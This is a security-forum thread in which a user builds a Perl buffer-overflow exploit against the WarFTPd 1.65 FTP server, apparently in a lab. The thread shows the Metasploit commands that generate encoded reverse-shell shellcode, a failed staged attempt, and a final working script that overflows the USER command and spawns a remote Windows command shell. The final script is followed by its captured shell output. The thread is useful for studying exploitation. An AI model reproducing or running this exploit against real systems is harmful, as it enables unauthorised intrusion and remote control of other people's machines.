question about building a perl exploit using metasploit

Viewing 4 reply threads
  • Author
    Posts
    • #2627
      apollo
      Participant

      I was recently trying to put together an example of how you can use metasploit to generate exploit code and I ran up against an issue.  Hopefully someone can tell me where I went wrong in this process.

      The exploit I wanted to demo warftpd 1.65 since theres a whole lot of stuff out there already on it.  Looking at the metasploit module :
      exploit/windows/ftp/warftpd_165_user I find that


      'BadChars' => "x00x0ax0dx40",
      'Ret'      => 0x71ab1d54  # for XP SP0

      Now, using the msf tools, I generate the exploit code:


      ~/metasploit$ ./msfpayload windows/shell/reverse_tcp exitfunc=process,lhost=192.168.50.129,lport=4444 r | ./msfencode -b  'x00x0ax0dx40' -t perl
      [*] x86/shikata_ga_nai succeeded, final size 205

      "xbdx69x9ex09x95xdbxcaxd9x74x24xf4x33xc9xb1" .
      "x2dx58x31x68x14x83xe8xfcx03x68x10x8bx6bxf5" .
      "xffxa0xd3xeexf9xc9x23x11x99x04x07x65x27x5a" .
      "x3cx06xe5xdax43x18x9ex4dx64xe7x4bxfax50x7d" .
      "x8ax12xa9x41x14x46x0bx8bx2ax97x4ex88xf5xe2" .
      "xb8xd2x93x35x8fxa0xb8x0ex84x04x1bx91x73xfc" .
      "xe8x8dxdax8axa0xb1xddx65x3dxe5x44xfcx2exd1" .
      "x6ax9ex51xf9xa2xbbxcax72x87x0bx98xc4x04xe7" .
      "xeexd8xb9x7cx66xe8x9fxe4x24x8ex77xdaxf8x26" .
      "xffx6fxcfxe9xabxe9x96x67x34x09x3ex12xe7xa6" .
      "xecx4fx4bx1ax50x3cxc2x7bx30x43x3bx8bxbfx14" .
      "x97xeax06x7dxc8x0cxaexe7x4ex5ax20x18x66x0c" .
      "xd7x26x2fx01xa9xc0x58x77xf5x6axcaxfexe6x18" .
      "xfcx53xbexbax45x04x45xbdx60xfbxf1x4dxddxaf" .
      "xaex1exbbxf6x91x98xbcxefx18";

      and then I incorporate all of that into the perl exploit


      #!/usr/bin/perl
      use IO::Socket;

      my $sock = new IO::Socket::INET (
                      PeerAddr => "192.168.50.128",
                      PeerPort =>"21",
                      Proto => "tcp",
                      );
      $trash = <$sock>;
      $str = "USER " . "A"x485 ."x54x1dxabx71" . "x41"x115 ;
      $str .= "x29xc9xb1x2dxdaxc5xb8x0bxe6x4fx25xd9x74x24" .
      "xf4x5ex31x46x15x03x46x15x83xc6x04xe9x13xb3" .
      "x4fx06x9cxa4x69x27xdcxcaxeaxe6xf8xbex96x34" .
      "x74xbcx55x3cx8bxd2x2dxebxabx2dxd8x98x98xb7" .
      "x1dx70xd1x07x84x20xd3x42xbax39x16xd6x05x4c" .
      "x60x94xe3x97x46x6ex0fxacxddxdexebx33x0bx86" .
      "x78x2fx92xccx30x53x25x3axcdx47xbcx35xbexb3" .
      "xa2x24xc0x5bxebx7dx5ax10x4fxb2x28x66x5cx39" .
      "x5ex7axf1xb6xf7x8ax57xafx54xecx0fx1cx69x98" .
      "xb8x11xbfx07x13xb0x06xc5xfbxc3xafxbcxafx68" .
      "x03xedx0cxdcxe0x42x1ax05x80xe5xf3xc2x4fxb2" .
      "x58xb5xf6xdbx80xc6xdfx45x86x91x8fx76x2ex76" .
      "x27x48x67x4bx39x2ex10xbdx65xc8xb3x34x76x7e" .
      "x24x14x2ex18xfdxcdxd5x1bx2bxa1x61xefx84x11" .
      "xddxbcx42x2fx21x7ax74xa9xa8";
      print $sock $str . "rn";
      $trash = <$sock>;
      print $sock "pass test rn";

      The exploit is lauched when I run it, my listener gets a connection back, however it doesn’t appear that cmd.exe is ever spawned and as soon as I send anything on the connection back the application crashes.  When I do it from within metasploit it works great, so I feel comfortable that this is something that I’m doing wrong.

      Thanks in advance for any insight.

    • #18830
      apollo
      Participant

      I figured I’d post back my solution in case anyone was interested, or in case anyone finds this via google (I was suprised that when i searched for msfencode and 2008 after < 24 hrs this was like the 5th entry on google).  I'm not sure why I didn't think about it, but the multi stage payload was the problem.  When I switched to using a single staged payload, that fixed the problem. 

      I punted and went and built the payload in executable form:


      ~/metasploit$ ./msfpayload windows/shell/reverse_tcp exitfunc=process,lhost=192.168.50.129,lport=4444 x > exp.exe
      Created by msfpayload (http://www.metasploit.com).
      Payload: windows/shell/reverse_tcp
      Length: 177
      Options: exitfunc=process,lhost=192.168.50.129,lport=4444

      But.. when I went to run exp.exe on the vulnerable machine.. it crashed, which is what brought me back to the single stage.  Anyway.. I got success with the windows/shell_reverse_tcp payload.


      ~/metasploit$ ./msfpayload windows/shell_reverse_tcp exitfunc=process,lhost=192.168.50.129,lport=4444 r |./msfencode  -s 414 -b 'x00x0ax0dx40' -t perl
      [*] x86/shikata_ga_nai succeeded, final size 315

      "xd9xe1x33xc9xd9x74x24xf4xb1x49x5axbfx33x3a" .
      "x88xc8x31x7ax17x83xeaxfcx03x49x29x6ax3dx51" .
      "x27x81xf3x41x41xaaxf3x6exd2xdex60xb4x37x6a" .
      "x3dx88xbcx10xbbx88xc3x07x48x27xdcx5cx10x97" .
      "xddx89xe6x5cxe9xc6xf8x8cx23x19x63xfcxc0x59" .
      "xe0xfbx09x93x04x02x48xcfxe3x3fx18x34x24x4a" .
      "x45xbfx6bx90x84x2bxf5x53x8axe0x71x3cx8fxf7" .
      "x6exc1x83x7cxf9xa9xffx9ex9bxf2x31x44x3fx7f" .
      "x72x4ax4bx3fx79x21x3bxa3x2cxbexfcxd3x70xa9" .
      "x72xadx82xc5xdbxcex4dx73x8fx56x1ax4fx1dxfe" .
      "xadxdcx53xa1x05xdcx44x35x6dxcfx99xfex21xef" .
      "xb4x5fx4bxeax5fxdexa6xfdx9dxb5x52xfcx5exe5" .
      "xcbxd9xa8xf0xa1x8dx55x2cxeax62xf9x83x4exd6" .
      "xbex70xaex08x28xb6xf8x9bx28x50x91xcax76xfa" .
      "x32x64x67x97xddx9ax91x3dx7dx34x9dx97x14xaa" .
      "x30x42x16x1axd4x06x8cxfdx71xb5x21x68xd2x60" .
      "x93xa0x5bx75x89x7cxd5x9bx7fxbdx16xf1x15xb4" .
      "x24xfbx54xeax28x41x75x79xaex7dx2ex2axe4x15" .
      "x42xd3x48xf3x5dx5ex87x04x77xfax80xa8x29xac" .
      "x7fx26xcbx1fxd1xe3x9ax60x01x63xb0x46xa7xbd" .
      "x99x87x7ex2bxe1x87x48x54xcdx10x50xd3x28x99" .
      "x61x56xb1xa5x48x67xcexa5x8ax47x59x28xadx85" .
      "xe9x87xb2x9fxf1xf8x47";

      Which brought me back to final code which worked..


      #!/usr/bin/perl
      use IO::Socket;

      my $sock = new IO::Socket::INET (
                      PeerAddr => "192.168.50.128",
                      PeerPort =>"21",
                      Proto => "tcp",
                      );
      $str = "USER " . "x90"x485 ."x54x1dxabx71" . "x90"x115 ;
      $str .= "xb8x84x3bx15xf2xdaxdbxd9x74x24xf4x31xc9xb1" .
      "x49x5ax83xeaxfcx31x42x0ex03xc6x35xf7x07x3a" .
      "x23x1cxaax2ax4dx1dxcax55xcex69x59x8dx2bxe5" .
      "xe7xf1xb8x85xe2x71xbex9ax66xcexd8xefx26xf0" .
      "xd9x04x91x7bxedx51x23x95x3fxa6xbdxc5xc4xe6" .
      "xcax12x04x2cx3fx1dx44x5axb4x26x1cxb9x1dx2d" .
      "x79x4ax02xe9x80xa6xdbx7ax8ex73xafx23x93x82" .
      "x44xd8x87x0fx13xb2xf3x13x45x89xcdxf0xe1x86" .
      "x6dx37x61xd8x7dxbcx05xc4xd0x49xa5xfcx74x26" .
      "xa8xb2x86x5axe4xb5x41xc4x56x2fx06x3ax6bxc7" .
      "xa1x4fxb9x48x1ax4fx6dx1ex69x42x72xe5x3dx62" .
      "x5dx46x37x79x04xf9xaax8axcbxacx5ex89x34x9e" .
      "xf7x54xc3xebxa5x30x2bxc5xe5xedx80xbax4ax41" .
      "x64x6fxb2xb5x02x4fxe4x04x52x29x9dx79x08xd3" .
      "x0exf3x51x8exd9xefx6bx1ax79xa7x74x8cx10x57" .
      "xdax65x1ax87xbaxefx80x4ex2bx8cx25xe5xfbx0b" .
      "x9fx35x72x4cxb5x81x0cx70x7bxcaxfcxdexe9x43" .
      "xffxe0x50x79xfex5ex79x0cx84x66x2axa5xd2xfe" .
      "x5ex44x97xe8x61xcdxf0xebx48x75x56x41x24xdb" .
      "x09x0fxc7x8axf8x9ax96xd3x2bx4cxb4xf5xc9x42" .
      "x95xfax04x30xe5xfax9ex3bxc9x6dx06xbax2cx14" .
      "x37x49xb5x18x11x4exc2x1ax61x60x45x9dx46x62" .
      "xe5x32x88xb4xf5x65x7c";
      print $sock $str . "rn";

      and then…. tada!



      Microsoft Windows XP [Version 5.1.2600]
      (C) Copyright 1985-2001 Microsoft Corp.

      C:Program FilesWar-ftpd>
    • #18831
      KrisTeason
      Participant

      Nice work.

    • #18832
      Anonymous
      Participant

      that makes sense since there was no payload handler in place

    • #18833
      RoleReversal
      Participant

      Nicely done Apollo

      and thanks for posting the solution aswell as the problem.

Viewing 4 reply threads
  • You must be logged in to reply to this topic.

Copyright ©2021 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?